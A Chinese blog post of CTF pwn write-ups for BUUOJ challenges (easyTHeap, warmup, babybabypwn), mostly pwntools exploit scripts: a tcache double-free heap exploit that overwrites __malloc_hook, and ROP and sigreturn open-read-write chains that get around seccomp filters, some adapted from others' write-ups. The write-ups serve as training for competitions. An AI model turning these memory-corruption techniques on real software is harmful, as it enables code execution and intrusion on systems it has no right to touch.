登录后台

页面导航

本文编写于 255 天前,最后修改于 93 天前,其中某些信息可能已经过时。

easyTHeap

分析:可以add七个chunk,大小在0~0x100,delete三次

存在uaf漏洞,在delete函数里free掉heap_addr,将size_addr置为0

这道题的难点在于只能delete三次,且不可edit已经free掉的chunk

所以只能攻击tcache,后面需要realloc——hook调节栈帧

提醒!!!ubuntu16和ubuntu18算出来的偏移不一样...

尽量用libc_base = malloc_hook - libc.sym['__malloc_hook']这样算

from pwn import *
context.log_level = 'debug'
debug = 0

elf = ELF('easyheap')

if debug:
    sh = process('./easyheap')
    libc = ELF('libc.so.6')
else:
    sh = remote('node3.buuoj.cn',25625)
    libc = ELF('libc.so.6')


def add(size):
    sh.sendlineafter('choice: ',str(1))
    sh.recvuntil('size?')
    sh.send(str(size))

def show(idx):
    sh.sendlineafter('choice: ',str(3))
    sh.recvuntil('idx?')
    sh.sendline(str(idx))
def edit(idx,data):
    sh.sendlineafter('choice: ',str(2))
    sh.recvuntil('idx?')
    sh.sendline(str(idx))
    sh.recvuntil('content:')
    sh.send(str(data))
def delete(idx):
    sh.sendlineafter('choice: ',str(4))
    sh.recvuntil('idx?')
    sh.sendline(str(idx))

add(0x88)#0
add(0xf8)#1
delete(1)
delete(1)
show(1)
heap_addr = u64(sh.recv(6).ljust(8,'\x00')) - 0x2e0
add(0xf8)#2
edit(2,p64(heap_addr))
add(0xf8)#3
edit(3,'a')
add(0xf8)#4
edit(4,p64(0xFFFFFFFFFFFFFFFF)*4)
delete(0)
show(0)
#gdb.attach(sh)
libc_addr = u64(sh.recv(6).ljust(8,'\x00')) - 0x3afca0  
log.success('libc_addr: '+hex(libc_addr))
edit(4,p64(0x0000010000000000)+p64(0)*12+p64(libc_addr+0x3b0c28))
add(0x68)#5
edit(5,p64(0x10a38c+libc_addr)+p64(libc_addr+libc.symbols['__libc_realloc']+4))
#gdb.attach(sh)
add(0x10)#6
sh.interactive()

simpleHeap

单字节溢出,不浪费时间做了

warmup

沙箱的题,先看一下禁用了哪些函数

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x07 0x00 0x40000000  if (A >= 0x40000000) goto 0011
 0004: 0x15 0x06 0x00 0x0000003b  if (A == execve) goto 0011
 0005: 0x15 0x00 0x04 0x00000001  if (A != write) goto 0010
 0006: 0x20 0x00 0x00 0x00000024  A = count >> 32 # write(fd, buf, count)
 0007: 0x15 0x00 0x02 0x00000000  if (A != 0x0) goto 0010
 0008: 0x20 0x00 0x00 0x00000020  A = count # write(fd, buf, count)
 0009: 0x15 0x01 0x00 0x00000010  if (A == 0x10) goto 0011
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0011: 0x06 0x00 0x00 0x00000000  return KILL

这道题需要用orw来解决

open-》read-》write/puts-》

刚开始需要在一个地址写入flag的路径,然后才能读

from pwn import *
context.log_level = 'debug'
debug = 0
elf = ELF('pwn')

if debug:
    sh = process('./pwn')
    libc = elf.libc
else:
    sh = remote('node3.buuoj.cn',26995)
    libc = ELF('libc-2.23.so')
sh.recvuntil('Here is my gift: ')
libc_base = int(sh.recv(14),16) - libc.symbols['puts']
log.success('libc_base: '+hex(libc_base))

pop_rdi_ret=libc_base+0x21102
pop_rsi_ret=libc_base+0x202e8
pop_rdx_ret=libc_base+0x1b92
pop_rax_ret=libc_base+0x33544
buf = libc_base+libc.symbols['__free_hook']

open_addr=libc_base+libc.symbols['open']
read_addr=libc_base+libc.symbols['read']
puts_addr=libc_base+libc.symbols['write']

payload = p64(0)+p64(pop_rsi_ret)+p64(buf)+p64(pop_rdx_ret)+p64(0x30)+p64(read_addr)
payload += p64(pop_rdi_ret)+p64(buf)+p64(pop_rsi_ret)+p64(0)+p64(pop_rdx_ret)+p64(0)+p64(open_addr)
payload += p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(buf)+p64(pop_rdx_ret)+p64(0x100)+p64(read_addr)
payload += p64(pop_rdi_ret)+p64(1)+p64(pop_rsi_ret)+p64(buf)+p64(pop_rdx_ret)+p64(0x100)+p64(puts_addr)

sh.recvuntil('something: ')
sh.send(payload)
sh.recvuntil('name?')
sh.send('a'*0x78+p64(pop_rdi_ret))
pause()
sh.send('flag\x00')
sh.interactive()

babybabypwn

seccomp的题

$ seccomp-tools dump ./vn_pwn_babybabypwn_1 
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x0d 0xc000003e  if (A != ARCH_X86_64) goto 0015
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x0a 0xffffffff  if (A != 0xffffffff) goto 0015
 0005: 0x15 0x09 0x00 0x00000009  if (A == mmap) goto 0015
 0006: 0x15 0x08 0x00 0x0000000a  if (A == mprotect) goto 0015
 0007: 0x15 0x07 0x00 0x00000029  if (A == socket) goto 0015
 0008: 0x15 0x06 0x00 0x0000002a  if (A == connect) goto 0015
 0009: 0x15 0x05 0x00 0x00000031  if (A == bind) goto 0015
 0010: 0x15 0x04 0x00 0x00000032  if (A == listen) goto 0015
 0011: 0x15 0x03 0x00 0x00000038  if (A == clone) goto 0015
 0012: 0x15 0x02 0x00 0x00000039  if (A == fork) goto 0015
 0013: 0x15 0x01 0x00 0x0000003b  if (A == execve) goto 0015
 0014: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0015: 0x06 0x00 0x00 0x00000000  return KILL

SOP的题,自己的wp跑不通,,参考别人的wp

https://blog.csdn.net/weixin_44145820/article/details/105246356

from pwn import *
context.log_level = 'debug'
r = remote("node3.buuoj.cn",  28896)
context(arch = 'amd64', os= 'linux')
print r.recvuntil("Here is my gift: 0x")
libc = ELF("libc-2.23.so")
puts_addr = int(r.recvuntil('\n').strip(), 16)
libc_base = puts_addr - libc.symbols['puts']
libc.address = libc_base
success("libc_base:" + hex(libc_base))
buf = libc.sym['environ']
pop_rdi = 0x021102 + libc_base
pop_rdx_rsi = 0x1150c9 + libc_base
pop_rdx = 0x001b92 + libc_base
syscall = 0x0bc375 + libc_base

frame = SigreturnFrame()
frame.rax = constants.SYS_read
frame.rsp = buf + 8
frame.rdi = 0
frame.rsi = buf
frame.rdx = 0x200
frame.rip = syscall
payload = str(frame)[8:]
r.sendline(payload)

payload = 'flag' + '\x00' * 4 + p64(pop_rdi) + p64(buf) + p64(pop_rdx_rsi) + p64(0) * 2 + p64(libc.symbols['open'])
payload += p64(pop_rdi) + p64(3) + p64(pop_rdx_rsi) + p64(0x100) + p64(buf) + p64(libc.symbols['read'])
payload += p64(pop_rdi) + p64(1) + p64(pop_rdx_rsi) + p64(0x100) + p64(buf) + p64(libc.symbols['write'])
r.sendline(payload)
r.interactive()

http://www.starssgo.top/2020/03/04/%C2%96%C2%96%C2%96%C2%96-V-N2020-%E5%85%AC%E5%BC%80%E8%B5%9B-pwn/#babybabypwn

# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
p = 0
def pwn(ip,port,debug,flaag):
    elf = ELF(flaag)
    global p
    if(debug == 1):
        p = process(flaag)

    else:
        p = remote(ip,port)
    gdb.attach(p)
    p.recvuntil('0x')
    puts_addr=int(p.recv(12),16)
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
    libcbase_addr=puts_addr-libc.symbols['puts']
    open_addr=libcbase_addr+libc.symbols['open']
    read_addr=libcbase_addr+libc.symbols['read']
    free_hook=libcbase_addr+libc.symbols['__free_hook']
    pop_rdi_ret=libcbase_addr+libc.search(asm("pop rdi\nret")).next()
    pop_rdx_ret=libcbase_addr+libc.search(asm("pop rdx\nret")).next()
    pop_rsi_ret=libcbase_addr+libc.search(asm("pop rsi\nret")).next()
    frame = SigreturnFrame()
    frame.rdi = 0
    frame.rax = 0
    frame.rsi = (libcbase_addr + libc.symbols['__free_hook'])
    frame.rdx = 0x2000
    frame.rsp = (libcbase_addr + libc.symbols['__free_hook'])
    frame.rip = libcbase_addr + 0x00000000000bc375 #: syscall; ret; 
    p.sendafter("magic message: ",str(frame)[8:])
    payload=p64(pop_rdi_ret)+p64(free_hook+0x78)+p64(pop_rsi_ret)+p64(72)+p64(open_addr)
    payload+=p64(pop_rsi_ret)+p64(free_hook+0x100)+p64(pop_rdi_ret)+p64(3)+p64(pop_rdx_ret)+p64(0x100)+p64(read_addr)
    payload+=p64(pop_rdi_ret)+p64(free_hook+0x100)+p64(puts_addr)+'flag\x00'
    print "len=>",hex(len(payload))
    p.sendline(payload)
    p.interactive()
if __name__ == '__main__':
    pwn('buuoj.cn',25638,1,'./babypwn')